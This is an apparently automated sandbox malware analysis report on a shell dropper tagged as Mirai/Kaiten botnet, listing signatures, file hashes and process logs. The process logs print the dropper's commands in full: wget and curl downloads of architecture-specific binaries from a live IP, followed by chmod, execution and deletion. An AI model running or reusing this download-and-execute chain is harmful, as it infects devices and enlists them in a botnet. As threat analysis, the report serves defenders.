Malware Analysis Report

2025-05-28 17:41

Sample ID 250520-vnnp2shn2v
Target x.sh
SHA256 f8db4d2d9ec809a2d86f015f3a25685e47ca8889003914e2a5df5b9bfc6eabac
Tags
kaiten mirai owari botnet defense_evasion discovery antivm
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V16

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral3

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral4

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

f8db4d2d9ec809a2d86f015f3a25685e47ca8889003914e2a5df5b9bfc6eabac

Threat Level: Known bad

The file x.sh was found to be: Known bad.

Malicious Activity Summary

kaiten mirai owari botnet defense_evasion discovery antivm

Detects Kaiten/Tsunami payload

Detects Kaiten/Tsunami Payload

Mirai family

Mirai

Kaiten family

Kaiten/Tsunami

Modifies Watchdog functionality

Unexpected DNS network traffic destination

File and Directory Permissions Modification

Executes dropped EXE

Enumerates running processes

Enumerates active TCP sockets

Reads system network configuration

Checks CPU configuration

Changes its process name

Writes file to tmp directory

Reads runtime system information

System Network Configuration Discovery

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2025-05-20 17:08

Signatures

N/A

Analysis: behavioral3

Detonation Overview

Submitted

2025-05-20 17:08

Reported

2025-05-20 17:10

Platform

debian9-mipsbe-20240418-en

Max time kernel

41s

Max time network

39s

Command Line

[/tmp/x.sh]

Signatures

Detects Kaiten/Tsunami Payload

Description Indicator Process Target
N/A N/A N/A N/A

Detects Kaiten/Tsunami payload

Description Indicator Process Target
N/A N/A N/A N/A

Kaiten family

kaiten

Kaiten/Tsunami

botnet kaiten

Mirai

botnet mirai

Mirai family

mirai

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/GoldAge3ATOarm /tmp/x.sh N/A
N/A /tmp/GoldAge3ATOarm5 /tmp/x.sh N/A
N/A /tmp/GoldAge3ATOarm6 /tmp/x.sh N/A
N/A /tmp/GoldAge3ATOarm7 /tmp/x.sh N/A
N/A /tmp/GoldAge3ATOm68k /tmp/x.sh N/A
N/A /tmp/GoldAge3ATOmips /tmp/x.sh N/A
N/A /tmp/GoldAge3ATOmpsl /tmp/x.sh N/A
N/A /tmp/GoldAge3ATOppc /tmp/x.sh N/A
N/A /tmp/GoldAge3ATOsh4 /tmp/x.sh N/A
N/A /tmp/GoldAge3ATOspc /tmp/x.sh N/A
N/A /tmp/GoldAge3ATOx64 /tmp/x.sh N/A
N/A /tmp/GoldAge3ATOx86 /tmp/x.sh N/A
N/A /tmp/bash /tmp/x.sh N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /tmp/GoldAge3ATOmips N/A
N/A N/A /bin/rm N/A
N/A N/A /bin/rm N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/GoldAge3ATOarm7 /usr/bin/curl N/A
File opened for modification /tmp/GoldAge3ATOm68k /usr/bin/curl N/A
File opened for modification /tmp/GoldAge3ATOppc /usr/bin/curl N/A
File opened for modification /tmp/GoldAge3ATOsh4 /usr/bin/curl N/A
File opened for modification /tmp/GoldAge3ATOx86 /usr/bin/curl N/A
File opened for modification /tmp/GoldAge3ATOarm5 /usr/bin/curl N/A
File opened for modification /tmp/GoldAge3ATOmpsl /usr/bin/curl N/A
File opened for modification /tmp/GoldAge3ATOppc /usr/bin/wget N/A
File opened for modification /tmp/GoldAge3ATOsh4 /usr/bin/wget N/A
File opened for modification /tmp/GoldAge3ATOspc /usr/bin/wget N/A
File opened for modification /tmp/GoldAge3ATOx64 /usr/bin/wget N/A
File opened for modification /tmp/bash /usr/bin/wget N/A
File opened for modification /tmp/GoldAge3ATOarm /usr/bin/wget N/A
File opened for modification /tmp/GoldAge3ATOarm5 /usr/bin/wget N/A
File opened for modification /tmp/GoldAge3ATOarm6 /usr/bin/wget N/A
File opened for modification /tmp/GoldAge3ATOarm6 /usr/bin/curl N/A
File opened for modification /tmp/GoldAge3ATOarm7 /usr/bin/wget N/A
File opened for modification /tmp/GoldAge3ATOmips /usr/bin/wget N/A
File opened for modification /tmp/GoldAge3ATOmips /usr/bin/curl N/A
File opened for modification /tmp/GoldAge3ATOmpsl /usr/bin/wget N/A
File opened for modification /tmp/GoldAge3ATOarm /usr/bin/curl N/A
File opened for modification /tmp/GoldAge3ATOm68k /usr/bin/wget N/A
File opened for modification /tmp/GoldAge3ATOspc /usr/bin/curl N/A
File opened for modification /tmp/GoldAge3ATOx64 /usr/bin/curl N/A
File opened for modification /tmp/GoldAge3ATOx86 /usr/bin/wget N/A
File opened for modification /tmp/bash /usr/bin/curl N/A

Processes

/tmp/x.sh

[/tmp/x.sh]

/usr/bin/wget

[wget http://185.236.24.192/GoldAge3ATOarm -O /tmp/GoldAge3ATOarm]

/usr/bin/curl

[curl http://185.236.24.192/GoldAge3ATOarm -o /tmp/GoldAge3ATOarm]

/bin/chmod

[chmod +x /tmp/GoldAge3ATOarm]

/tmp/GoldAge3ATOarm

[/tmp/GoldAge3ATOarm]

/bin/rm

[rm -rf /tmp/GoldAge3ATOarm]

/bin/rm

[rm -rf /tmp/GoldAge3ATOarm.1]

/usr/bin/wget

[wget http://185.236.24.192/GoldAge3ATOarm5 -O /tmp/GoldAge3ATOarm5]

/usr/bin/curl

[curl http://185.236.24.192/GoldAge3ATOarm5 -o /tmp/GoldAge3ATOarm5]

/bin/chmod

[chmod +x /tmp/GoldAge3ATOarm5]

/tmp/GoldAge3ATOarm5

[/tmp/GoldAge3ATOarm5]

/bin/rm

[rm -rf /tmp/GoldAge3ATOarm5]

/bin/rm

[rm -rf /tmp/GoldAge3ATOarm5.1]

/usr/bin/wget

[wget http://185.236.24.192/GoldAge3ATOarm6 -O /tmp/GoldAge3ATOarm6]

/usr/bin/curl

[curl http://185.236.24.192/GoldAge3ATOarm6 -o /tmp/GoldAge3ATOarm6]

/bin/chmod

[chmod +x /tmp/GoldAge3ATOarm6]

/tmp/GoldAge3ATOarm6

[/tmp/GoldAge3ATOarm6]

/bin/rm

[rm -rf /tmp/GoldAge3ATOarm6]

/bin/rm

[rm -rf /tmp/GoldAge3ATOarm6.1]

/usr/bin/wget

[wget http://185.236.24.192/GoldAge3ATOarm7 -O /tmp/GoldAge3ATOarm7]

/usr/bin/curl

[curl http://185.236.24.192/GoldAge3ATOarm7 -o /tmp/GoldAge3ATOarm7]

/bin/chmod

[chmod +x /tmp/GoldAge3ATOarm7]

/tmp/GoldAge3ATOarm7

[/tmp/GoldAge3ATOarm7]

/bin/rm

[rm -rf /tmp/GoldAge3ATOarm7]

/bin/rm

[rm -rf /tmp/GoldAge3ATOarm7.1]

/usr/bin/wget

[wget http://185.236.24.192/GoldAge3ATOm68k -O /tmp/GoldAge3ATOm68k]

/usr/bin/curl

[curl http://185.236.24.192/GoldAge3ATOm68k -o /tmp/GoldAge3ATOm68k]

/bin/chmod

[chmod +x /tmp/GoldAge3ATOm68k]

/tmp/GoldAge3ATOm68k

[/tmp/GoldAge3ATOm68k]

/bin/rm

[rm -rf /tmp/GoldAge3ATOm68k]

/bin/rm

[rm -rf /tmp/GoldAge3ATOm68k.1]

/usr/bin/wget

[wget http://185.236.24.192/GoldAge3ATOmips -O /tmp/GoldAge3ATOmips]

/usr/bin/curl

[curl http://185.236.24.192/GoldAge3ATOmips -o /tmp/GoldAge3ATOmips]

/bin/chmod

[chmod +x /tmp/GoldAge3ATOmips]

/tmp/GoldAge3ATOmips

[/tmp/GoldAge3ATOmips]

/bin/rm

[rm -rf /tmp/GoldAge3ATOmips]

/bin/rm

[rm -rf /tmp/GoldAge3ATOmips.1]

/usr/bin/wget

[wget http://185.236.24.192/GoldAge3ATOmpsl -O /tmp/GoldAge3ATOmpsl]

/usr/bin/curl

[curl http://185.236.24.192/GoldAge3ATOmpsl -o /tmp/GoldAge3ATOmpsl]

/bin/chmod

[chmod +x /tmp/GoldAge3ATOmpsl]

/tmp/GoldAge3ATOmpsl

[/tmp/GoldAge3ATOmpsl]

/bin/rm

[rm -rf /tmp/GoldAge3ATOmpsl]

/bin/rm

[rm -rf /tmp/GoldAge3ATOmpsl.1]

/usr/bin/wget

[wget http://185.236.24.192/GoldAge3ATOppc -O /tmp/GoldAge3ATOppc]

/usr/bin/curl

[curl http://185.236.24.192/GoldAge3ATOppc -o /tmp/GoldAge3ATOppc]

/bin/chmod

[chmod +x /tmp/GoldAge3ATOppc]

/tmp/GoldAge3ATOppc

[/tmp/GoldAge3ATOppc]

/bin/rm

[rm -rf /tmp/GoldAge3ATOppc]

/bin/rm

[rm -rf /tmp/GoldAge3ATOppc.1]

/usr/bin/wget

[wget http://185.236.24.192/GoldAge3ATOsh4 -O /tmp/GoldAge3ATOsh4]

/usr/bin/curl

[curl http://185.236.24.192/GoldAge3ATOsh4 -o /tmp/GoldAge3ATOsh4]

/bin/chmod

[chmod +x /tmp/GoldAge3ATOsh4]

/tmp/GoldAge3ATOsh4

[/tmp/GoldAge3ATOsh4]

/bin/rm

[rm -rf /tmp/GoldAge3ATOsh4]

/bin/rm

[rm -rf /tmp/GoldAge3ATOsh4.1]

/usr/bin/wget

[wget http://185.236.24.192/GoldAge3ATOspc -O /tmp/GoldAge3ATOspc]

/usr/bin/curl

[curl http://185.236.24.192/GoldAge3ATOspc -o /tmp/GoldAge3ATOspc]

/bin/chmod

[chmod +x /tmp/GoldAge3ATOspc]

/tmp/GoldAge3ATOspc

[/tmp/GoldAge3ATOspc]

/bin/rm

[rm -rf /tmp/GoldAge3ATOspc]

/bin/rm

[rm -rf /tmp/GoldAge3ATOspc.1]

/usr/bin/wget

[wget http://185.236.24.192/GoldAge3ATOx64 -O /tmp/GoldAge3ATOx64]

/usr/bin/curl

[curl http://185.236.24.192/GoldAge3ATOx64 -o /tmp/GoldAge3ATOx64]

/bin/chmod

[chmod +x /tmp/GoldAge3ATOx64]

/tmp/GoldAge3ATOx64

[/tmp/GoldAge3ATOx64]

/bin/rm

[rm -rf /tmp/GoldAge3ATOx64]

/bin/rm

[rm -rf /tmp/GoldAge3ATOx64.1]

/usr/bin/wget

[wget http://185.236.24.192/GoldAge3ATOx86 -O /tmp/GoldAge3ATOx86]

/usr/bin/curl

[curl http://185.236.24.192/GoldAge3ATOx86 -o /tmp/GoldAge3ATOx86]

/bin/chmod

[chmod +x /tmp/GoldAge3ATOx86]

/tmp/GoldAge3ATOx86

[/tmp/GoldAge3ATOx86]

/bin/rm

[rm -rf /tmp/GoldAge3ATOx86]

/bin/rm

[rm -rf /tmp/GoldAge3ATOx86.1]

/usr/bin/wget

[wget http://185.236.24.192/bash -O /tmp/bash]

/usr/bin/curl

[curl http://185.236.24.192/bash -o /tmp/bash]

/bin/chmod

[chmod +x /tmp/bash]

/tmp/bash

[/tmp/bash]

/bin/rm

[rm -rf /tmp/bash]

/bin/rm

[rm -rf /tmp/bash.1]

Network

Country Destination Domain Proto
FI 185.236.24.192:80 185.236.24.192 tcp
FI 185.236.24.192:80 185.236.24.192 tcp
FI 185.236.24.192:80 185.236.24.192 tcp
FI 185.236.24.192:80 185.236.24.192 tcp
FI 185.236.24.192:80 185.236.24.192 tcp
FI 185.236.24.192:80 185.236.24.192 tcp
FI 185.236.24.192:80 185.236.24.192 tcp
FI 185.236.24.192:80 185.236.24.192 tcp
FI 185.236.24.192:80 185.236.24.192 tcp
FI 185.236.24.192:80 185.236.24.192 tcp
FI 185.236.24.192:80 185.236.24.192 tcp
FI 185.236.24.192:80 185.236.24.192 tcp
FI 185.236.24.192:80 185.236.24.192 tcp
FI 185.236.24.192:80 185.236.24.192 tcp
FI 185.236.24.192:80 185.236.24.192 tcp
FI 185.236.24.192:80 185.236.24.192 tcp
FI 185.236.24.192:80 185.236.24.192 tcp
FI 185.236.24.192:80 185.236.24.192 tcp
FI 185.236.24.192:80 185.236.24.192 tcp
FI 185.236.24.192:80 185.236.24.192 tcp
FI 185.236.24.192:80 185.236.24.192 tcp
FI 185.236.24.192:80 185.236.24.192 tcp
FI 185.236.24.192:80 185.236.24.192 tcp
FI 185.236.24.192:80 185.236.24.192 tcp
FI 185.236.24.192:80 185.236.24.192 tcp
FI 185.236.24.192:80 185.236.24.192 tcp

Files

/tmp/GoldAge3ATOarm

MD5 c37a156e474db5c40f0affd035ee358f
SHA1 990bc43195246650ee6929c2c40afe7efa14d058
SHA256 18a3befd33ac144b1ae8ece9be2fa9517df8ea4ef62b0d210cce7b6b7e263876
SHA512 ebaf7a2ab1644ac755384051f172408586a16bbbbe1c5e1b99c2981d90ced4e9689467e57b2a042fd0b92a7ba7de6022e92f765a8f3cbf55623d97ff48dc34d6

/tmp/GoldAge3ATOarm5

MD5 d8e7f95f2de61c8a75cf9cf7777ba06d
SHA1 040e5656fed375ef1c7e253822f0edb3f350616b
SHA256 392ca33932bec6f83bd53b51970eecf5ef8ff6ca0f47ffa640beff921c20a2db
SHA512 6e1c39b175b90612d16b18c687af41045072578f0e80246c849809c3fb83a584184d47fd8d55654c563e38c46108e1ef84012f61d3c82a2d733ac3e644a34dc8

/tmp/GoldAge3ATOarm6

MD5 3c5c66502403c26ffd38c305e0073e56
SHA1 584b0a7b269f9e07d3d1ca9880b8710f035e435a
SHA256 f2a18d1a418690bfe26ff26db63fa327bd1c142a1fc3508960dfa75a194ac900
SHA512 48732ec0cb0abb84b63539bfc5fe4f0b2e3a4c40b384bec72b3c66d960b65844c5b6e5bc2d56b547542e5662e5f56bef6640f5f2b14c945e21ad0bd15ef09e89

/tmp/GoldAge3ATOarm7

MD5 d1bc7e87209a400dfa40307eca08289a
SHA1 b9922e7972f0c46ecbcc18503b37b46299d3eaf9
SHA256 7bc58e1c54dd5971bab649122ec1b0816ed621fc5a2d437d6994fe7eda4a395b
SHA512 258792c9507a36217af3cbc76d77c1f21f8d0c3dffc18e492779faf44d8c7d6f9dca1f01dfe8255f4e727e414065c8f1aa5f4b9f73405d0023fadb0600f5da50

/tmp/GoldAge3ATOm68k

MD5 b9e708d1101756b3452ff33eaaa984f9
SHA1 f7744930aa85da6dbf7785c91e01e419987ce4e5
SHA256 7c6f4467faa1c72f79a1c531fcb1619fa65aec4ce7c8cb2936552f1b06ed9cc1
SHA512 1372ee01debf96dc8dce942a3d5ade2217d86ced03f4d666687a792c1fbff28000a4041734b11037e1559138d57a92c4a33074b65e7bf719d1828d4ef2bb78fa

/tmp/GoldAge3ATOmips

MD5 db3d52d93de2b229748c916d261ca0d5
SHA1 29889196802fe35c0e5933991bd7f4a89de56946
SHA256 75c9cf0d001e46db32ff206a3595bddf61851db6c4a803e2233f2b348c969de5
SHA512 405b1b673e23f4fabe7f124101d0aa66e9d71b561260d5164bc29d76e74ae9dab58f7330b1860ccf27fde664d087408cd73f1c9429c2bf0af815c8f0f0ee6652

/tmp/GoldAge3ATOmpsl

MD5 2439dbad4a1cb56d7ea54b35aa36251e
SHA1 b9d2099aaab3868094bb20bf556b3b20e8ea5203
SHA256 050c88a81f61024402a9353deb359ca014d1cae2c699998223f5855d8fcaf552
SHA512 32ca9cee3d237c4920cf1ef3f4e0e2bd0b11698317f9030caf909ab8b74198cb3f4b5d18051c7ee168fec32fc925c059c1ab714fe530e13b600a787fcc67dc25

/tmp/GoldAge3ATOppc

MD5 92038a8e6f1123573cf5cd61d21f61ed
SHA1 cf01a5b89a91b6af3c7da41a3ade8e7a8e0d1083
SHA256 a93f71d045ede0d3d2ae06183f1f6f2d37a47122aed4fafeaafecb4a05f6afe8
SHA512 00f1a4365a51fa1a06a7e2d1222554049e35caf894898daf1e44f6a3e9962c50c4aa01840f91e21a443d6640c348decd8178070921acf9f13f91b5ff73915567

/tmp/GoldAge3ATOsh4

MD5 5eba0470ee235a99e4b34517333a1cd1
SHA1 0e417be4cc0769c9480f245941c2f0463147d1fd
SHA256 ffd3b51636907bb20012b0e954a100e3c57e97ae1b2ba7d3af521cf09f5ea5bb
SHA512 5dc3454c6fa7a7b53d7f8d7230f62866f6ae2bca9f3c74263e622676457f61ea623fb711a8d1ea84fda52dc6be1375af62359d6672b3335ccbd4633e1ca2b468

/tmp/GoldAge3ATOspc

MD5 dfcc2c1625e3a1788667a70ca731dedb
SHA1 bdc644788b8599579d8ce88e47270dc67839b226
SHA256 37999177b9eeb0ffbf4b074065e61ad01f22182a9ac102ddbcfc754d966b65b3
SHA512 1c13023098df56eeafde489642a65918250cb92889d564a94178645c544a7fb2cb478aa6e3a9b349ac872ba6cfd4c98b2c31dcafecadbfb1061352984c214d57

/tmp/GoldAge3ATOx64

MD5 399037675ef247197dec6471d9bfbf57
SHA1 1fa81b589ee9e8764216b386e4fd5d1d3738bc39
SHA256 9d5a6901e239005e00d80dbc77c7a5c764ea6ca89d4d56ed973676acfb6a5298
SHA512 68b4279897b60f8019bb33d12e50cf55dae3bc337cc5033aefcfe9275b7f33e31a88a773875d10b5a69243178f936f0ba278410870f7e04bd72eaf360cf1fda1

/tmp/GoldAge3ATOx86

MD5 b6fe48263b89bb87446e76bb55170f26
SHA1 d88d976b1701dafe670a07313f14d3f217855850
SHA256 68373bd10e71b2cc7e292480ef48a8ca039ecabf25919fcbef3c70b88cd9231c
SHA512 7e920ebe6209cb785ced9772b4ce046f32bae16b1a3f73ffe821aa0c5978a0ca0e86a9b609c7b1305ef52e2329fb394282a9da5b0ae6fbbb7ec367036281681b

/tmp/bash

MD5 89ce675ecc4ca2e46f1c412a7074aaf9
SHA1 cbd5de6624cfd3d76e4cb72eb49938c6b12b2f1d
SHA256 c2cdab77264c2bda90a1e150dad77a827183d358f51fbf2325282293809e6ad8
SHA512 a962bc08019f778d59d30ceab2d2c13e9e70d08b559b174ac0b63e0de98c248d1ca16ee1b2ae76e3bade67d493d12d8fabd7385fcc8427ad962d8f3785571a31

Analysis: behavioral4

Detonation Overview

Submitted

2025-05-20 17:08

Reported

2025-05-20 17:10

Platform

debian9-mipsel-20250410-en

Max time kernel

40s

Max time network

40s

Command Line

[/tmp/x.sh]

Signatures

Detects Kaiten/Tsunami Payload

Description Indicator Process Target
N/A N/A N/A N/A

Detects Kaiten/Tsunami payload

Description Indicator Process Target
N/A N/A N/A N/A

Kaiten family

kaiten

Kaiten/Tsunami

botnet kaiten

Mirai

botnet mirai

Mirai family

mirai

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/GoldAge3ATOarm /tmp/x.sh N/A
N/A /tmp/GoldAge3ATOarm5 /tmp/x.sh N/A
N/A /tmp/GoldAge3ATOarm6 /tmp/x.sh N/A
N/A /tmp/GoldAge3ATOarm7 /tmp/x.sh N/A
N/A /tmp/GoldAge3ATOm68k /tmp/x.sh N/A
N/A /tmp/GoldAge3ATOmips /tmp/x.sh N/A
N/A /tmp/GoldAge3ATOmpsl /tmp/x.sh N/A
N/A /tmp/GoldAge3ATOppc /tmp/x.sh N/A
N/A /tmp/GoldAge3ATOsh4 /tmp/x.sh N/A
N/A /tmp/GoldAge3ATOspc /tmp/x.sh N/A
N/A /tmp/GoldAge3ATOx64 /tmp/x.sh N/A
N/A /tmp/GoldAge3ATOx86 /tmp/x.sh N/A
N/A /tmp/bash /tmp/x.sh N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /bin/rm N/A
N/A N/A /bin/rm N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /tmp/GoldAge3ATOmips N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/GoldAge3ATOarm /usr/bin/curl N/A
File opened for modification /tmp/GoldAge3ATOarm5 /usr/bin/curl N/A
File opened for modification /tmp/GoldAge3ATOarm6 /usr/bin/curl N/A
File opened for modification /tmp/GoldAge3ATOmips /usr/bin/wget N/A
File opened for modification /tmp/GoldAge3ATOmpsl /usr/bin/wget N/A
File opened for modification /tmp/GoldAge3ATOsh4 /usr/bin/wget N/A
File opened for modification /tmp/GoldAge3ATOsh4 /usr/bin/curl N/A
File opened for modification /tmp/GoldAge3ATOspc /usr/bin/curl N/A
File opened for modification /tmp/GoldAge3ATOarm /usr/bin/wget N/A
File opened for modification /tmp/GoldAge3ATOarm5 /usr/bin/wget N/A
File opened for modification /tmp/GoldAge3ATOarm6 /usr/bin/wget N/A
File opened for modification /tmp/GoldAge3ATOarm7 /usr/bin/wget N/A
File opened for modification /tmp/GoldAge3ATOmips /usr/bin/curl N/A
File opened for modification /tmp/GoldAge3ATOmpsl /usr/bin/curl N/A
File opened for modification /tmp/GoldAge3ATOppc /usr/bin/curl N/A
File opened for modification /tmp/GoldAge3ATOspc /usr/bin/wget N/A
File opened for modification /tmp/GoldAge3ATOarm7 /usr/bin/curl N/A
File opened for modification /tmp/GoldAge3ATOm68k /usr/bin/wget N/A
File opened for modification /tmp/GoldAge3ATOm68k /usr/bin/curl N/A
File opened for modification /tmp/GoldAge3ATOx64 /usr/bin/wget N/A
File opened for modification /tmp/GoldAge3ATOx86 /usr/bin/wget N/A
File opened for modification /tmp/GoldAge3ATOx86 /usr/bin/curl N/A
File opened for modification /tmp/bash /usr/bin/wget N/A
File opened for modification /tmp/GoldAge3ATOppc /usr/bin/wget N/A
File opened for modification /tmp/GoldAge3ATOx64 /usr/bin/curl N/A
File opened for modification /tmp/bash /usr/bin/curl N/A

Processes

/tmp/x.sh

[/tmp/x.sh]

/usr/bin/wget

[wget http://185.236.24.192/GoldAge3ATOarm -O /tmp/GoldAge3ATOarm]

/usr/bin/curl

[curl http://185.236.24.192/GoldAge3ATOarm -o /tmp/GoldAge3ATOarm]

/bin/chmod

[chmod +x /tmp/GoldAge3ATOarm]

/tmp/GoldAge3ATOarm

[/tmp/GoldAge3ATOarm]

/bin/rm

[rm -rf /tmp/GoldAge3ATOarm]

/bin/rm

[rm -rf /tmp/GoldAge3ATOarm.1]

/usr/bin/wget

[wget http://185.236.24.192/GoldAge3ATOarm5 -O /tmp/GoldAge3ATOarm5]

/usr/bin/curl

[curl http://185.236.24.192/GoldAge3ATOarm5 -o /tmp/GoldAge3ATOarm5]

/bin/chmod

[chmod +x /tmp/GoldAge3ATOarm5]

/tmp/GoldAge3ATOarm5

[/tmp/GoldAge3ATOarm5]

/bin/rm

[rm -rf /tmp/GoldAge3ATOarm5]

/bin/rm

[rm -rf /tmp/GoldAge3ATOarm5.1]

/usr/bin/wget

[wget http://185.236.24.192/GoldAge3ATOarm6 -O /tmp/GoldAge3ATOarm6]

/usr/bin/curl

[curl http://185.236.24.192/GoldAge3ATOarm6 -o /tmp/GoldAge3ATOarm6]

/bin/chmod

[chmod +x /tmp/GoldAge3ATOarm6]

/tmp/GoldAge3ATOarm6

[/tmp/GoldAge3ATOarm6]

/bin/rm

[rm -rf /tmp/GoldAge3ATOarm6]

/bin/rm

[rm -rf /tmp/GoldAge3ATOarm6.1]

/usr/bin/wget

[wget http://185.236.24.192/GoldAge3ATOarm7 -O /tmp/GoldAge3ATOarm7]

/usr/bin/curl

[curl http://185.236.24.192/GoldAge3ATOarm7 -o /tmp/GoldAge3ATOarm7]

/bin/chmod

[chmod +x /tmp/GoldAge3ATOarm7]

/tmp/GoldAge3ATOarm7

[/tmp/GoldAge3ATOarm7]

/bin/rm

[rm -rf /tmp/GoldAge3ATOarm7]

/bin/rm

[rm -rf /tmp/GoldAge3ATOarm7.1]

/usr/bin/wget

[wget http://185.236.24.192/GoldAge3ATOm68k -O /tmp/GoldAge3ATOm68k]

/usr/bin/curl

[curl http://185.236.24.192/GoldAge3ATOm68k -o /tmp/GoldAge3ATOm68k]

/bin/chmod

[chmod +x /tmp/GoldAge3ATOm68k]

/tmp/GoldAge3ATOm68k

[/tmp/GoldAge3ATOm68k]

/bin/rm

[rm -rf /tmp/GoldAge3ATOm68k]

/bin/rm

[rm -rf /tmp/GoldAge3ATOm68k.1]

/usr/bin/wget

[wget http://185.236.24.192/GoldAge3ATOmips -O /tmp/GoldAge3ATOmips]

/usr/bin/curl

[curl http://185.236.24.192/GoldAge3ATOmips -o /tmp/GoldAge3ATOmips]

/bin/chmod

[chmod +x /tmp/GoldAge3ATOmips]

/tmp/GoldAge3ATOmips

[/tmp/GoldAge3ATOmips]

/bin/rm

[rm -rf /tmp/GoldAge3ATOmips]

/bin/rm

[rm -rf /tmp/GoldAge3ATOmips.1]

/usr/bin/wget

[wget http://185.236.24.192/GoldAge3ATOmpsl -O /tmp/GoldAge3ATOmpsl]

/usr/bin/curl

[curl http://185.236.24.192/GoldAge3ATOmpsl -o /tmp/GoldAge3ATOmpsl]

/bin/chmod

[chmod +x /tmp/GoldAge3ATOmpsl]

/tmp/GoldAge3ATOmpsl

[/tmp/GoldAge3ATOmpsl]

/bin/rm

[rm -rf /tmp/GoldAge3ATOmpsl]

/bin/rm

[rm -rf /tmp/GoldAge3ATOmpsl.1]

/usr/bin/wget

[wget http://185.236.24.192/GoldAge3ATOppc -O /tmp/GoldAge3ATOppc]

/usr/bin/curl

[curl http://185.236.24.192/GoldAge3ATOppc -o /tmp/GoldAge3ATOppc]

/bin/chmod

[chmod +x /tmp/GoldAge3ATOppc]

/tmp/GoldAge3ATOppc

[/tmp/GoldAge3ATOppc]

/bin/rm

[rm -rf /tmp/GoldAge3ATOppc]

/bin/rm

[rm -rf /tmp/GoldAge3ATOppc.1]

/usr/bin/wget

[wget http://185.236.24.192/GoldAge3ATOsh4 -O /tmp/GoldAge3ATOsh4]

/usr/bin/curl

[curl http://185.236.24.192/GoldAge3ATOsh4 -o /tmp/GoldAge3ATOsh4]

/bin/chmod

[chmod +x /tmp/GoldAge3ATOsh4]

/tmp/GoldAge3ATOsh4

[/tmp/GoldAge3ATOsh4]

/bin/rm

[rm -rf /tmp/GoldAge3ATOsh4]

/bin/rm

[rm -rf /tmp/GoldAge3ATOsh4.1]

/usr/bin/wget

[wget http://185.236.24.192/GoldAge3ATOspc -O /tmp/GoldAge3ATOspc]

/usr/bin/curl

[curl http://185.236.24.192/GoldAge3ATOspc -o /tmp/GoldAge3ATOspc]

/bin/chmod

[chmod +x /tmp/GoldAge3ATOspc]

/tmp/GoldAge3ATOspc

[/tmp/GoldAge3ATOspc]

/bin/rm

[rm -rf /tmp/GoldAge3ATOspc]

/bin/rm

[rm -rf /tmp/GoldAge3ATOspc.1]

/usr/bin/wget

[wget http://185.236.24.192/GoldAge3ATOx64 -O /tmp/GoldAge3ATOx64]

/usr/bin/curl

[curl http://185.236.24.192/GoldAge3ATOx64 -o /tmp/GoldAge3ATOx64]

/bin/chmod

[chmod +x /tmp/GoldAge3ATOx64]

/tmp/GoldAge3ATOx64

[/tmp/GoldAge3ATOx64]

/bin/rm

